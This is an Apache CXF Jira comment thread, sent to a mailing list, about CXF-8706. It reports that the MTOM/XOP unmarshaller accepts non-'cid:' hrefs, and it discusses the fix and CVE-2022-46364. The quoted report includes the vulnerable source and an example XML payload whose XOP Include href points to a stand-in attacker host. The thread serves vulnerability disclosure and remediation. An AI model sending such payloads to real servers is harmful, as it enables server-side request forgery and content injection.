[jira] [Commented] (CXF-8706) CXF MTOM handler allow content injection

Wed, 21 Dec 2022 09:07:11 -0800 


    [ 
https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17650941#comment-17650941
 ] 

Chunqing Lin commented on CXF-8706:
-----------------------------------

[~bergers] , this is not limited MTOM, basically it is part of the XML parser 
flow, so as long as the JAXBAttachmentUnmarshaller is being used, regardless 
MTOM enabled or not, or maybe even when it is JAX-RS call, it will trigger this 
issue.

[~reta] , I am glad this is fixed.  I looked at the Pull Request and all look 
good to me.

Did this prompted the new CVE-2022-46364: Apache CXF SSRF Vulnerability?

In the future, is there any better channel than this public Jira to report such 
vulnerability?  I have been kind of worried in the last few months that this 
information is publicly available.

Thanks in advance.

> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled, 
> Unmarshaller allows XOP Include tag to have href attributes that allow any 
> protocols.  According to the W3C MTOM spec, only "cid:" should be allowed for 
> href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) 
> line: 554    
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49    
>     MTOMDecorator.startElement(TagName) line: 70    
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId, 
> Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4), 
> StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else {// should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>  
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload"; 
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to